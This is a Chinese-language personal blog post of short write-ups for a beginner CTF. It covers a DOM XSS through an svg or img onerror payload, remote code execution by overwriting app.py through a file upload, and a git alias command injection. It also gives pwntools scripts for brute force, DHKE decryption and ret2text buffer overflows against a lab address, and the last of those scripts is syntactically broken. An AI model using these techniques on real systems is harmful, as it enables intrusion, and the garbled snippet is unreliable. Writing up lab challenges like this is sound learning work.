我还是一个萌新 - CTF! | Triri = Tritium 's Blog

萌新赛 WP 只写写有意思的题吧

# web

# babyjvav

https://www.tritium.work/2023/11/06/JAVA 入门的坑 /

# secchat

这里有一个插入 innerhtml 的 domxss 可以用 svg 标签或者 img 的 onerror 触发

注意到在发起聊天的时候 id 会调用这个 message 函数，就把 xss 构造进 id，发送给 admin，就能通过各种函数调用控制 admin 的行为了

# 大雪想考五百分

。。我觉得这个题低能的很

	daxue =new Proxy({
	"math": "150",
	"computer": new String("150"),
	"politics": 98,
	"english": 100,
	"flag": 0,
	value:500

	}, {
	get:function (target, prop, receiver) {
	if (prop === 'politics') {
	if (target.politics !== 100) {
	return target.politics++;
	} else {
	return target.politics;
	}
	};
	if(prop === "valueOf"){
	return function() {
	return target.value;
	};
	};
	if (prop === 'english') {
	if (target.english !== 100){
	return "99";
	}else {
	return target.english++;
	}
	};
	return Reflect.get(target, prop,receiver);
	}
	});

# 我新学的 flask

利用任意文件上传覆盖 /src/app.py, 添加一个恶意路由，就能 rce 了

# misc

# 大雪树锯结构

打 gitshell 的考察一个很少用的点

git -c alias.test='!/readflag' test

用 alias 引入外部命令

# 内存取证

用 vol 查看进程，dump 出 backdoor.exe, 读就行了

# 3G 之前是什么

想考信息论，但是在 ctf 环境下肯定有一种歪路

	while True:
	r = remote("172.20.14.117",53001)
	for i in range(15):
	print(r.recvuntil(b"Ask Shannon:\n[-] "))
	r.sendline(b"1")
	r.recvuntil(b"Now open the chests:\n[-] ")
	r.sendline(b'1 1 1 1 1 1 1')
	res = r.recvline().decode()
	if "You've found all the treas" in res:
	print(res)
	break
	else:
	print("next")
	r.close()
	continue

一共只有 128 种情况一定很快就会出现全 1 的

# crypto

# hard_pow

打长度扩展攻击 hashpumpy 装不明白，用了一个平替

https://github.com/shellfeel/hash-ext-attack/tree/master

# easy_pow

用 brutehash 跑出来就行了不用脚本

https://github.com/playGitboy/bruteHASH

# easy_dhke

什么东西都泄露了都偷过来缝进 pwntools 里

	from Crypto.Util.number import * # type: ignore
	from Crypto.Cipher import AES
	from Crypto.Util.Padding import pad,unpad

	import string
	import random
	import os
	from pwn import *

	# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
	p = 327824197795087630552811243153730025469
	# g is the base used for generating public keys in the Diffie-Hellman key exchange
	g = 5
	# alice is Alice's private key, an integer chosen by Alice
	alice = 22751
	# bob is Bob's private key, an integer chosen by Bob
	bob = 39494
	# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
	Bob = pow(g, bob, p)
	# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
	key = long_to_bytes(pow(Bob, alice, p))


	def encrypt(plain_text: bytes, key: bytes) -> bytes:
	cipher = AES.new(key, AES.MODE_ECB)
	cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
	return cipher_text


	def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
	cipher = AES.new(key, AES.MODE_ECB)
	plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
	return plain_text


	r = remote('172.20.14.117',40766)
	r.recvuntil(b'[+] Alice said :\n')
	cipher = r.recvuntil(b'\n')[0:-1]
	print(cipher)
	message = decrypt(cipher, key)
	print(message)
	r.recvuntil(b"[+] Now tell me what are they talking about:")
	r.sendline(message)
	r.recvuntil(b"[+] Tell me the cipher:")
	r.send(encrypt(b'HackedBy0xfa',key))
	print(r.recvall())

# easy_rsa

这个题的 n 实在简单，直接去 factordb 分解出来就能解密了

# leak_d

你都知道 d 了直接解密不就行了

脚本好像被我删了

# pwn

# right

自己研究出来了这个，ctfwiki 上最简单的 ret2text

	from pwn import *
	context(os='linux',arch='amd64',log_level='debug')
	r = remote("172.20.14.117",28202)
	addr = 0x40115A
	payload = flat([b'a'*0x28,addr])
	r.recvuntil(b'so please tell me what you want to tell me\n')
	# print(payload)
	r.sendline(payload)
	# r.sendline(b'ls')
	r.interactive()
	# print(r.recvline())

addr 是 system 那一行的地址，rbp-20h+8 覆盖到栈顶

# onepiece

	from pwn import *

	io=remote("172.20.14.117",61768)
	addr = 0x40119e
	payload=b"a"0x100+p64(addr)0x100
	io.sendline(payload)
	io.interactive()

乱出的我是看不明白 blindpwn

CTF!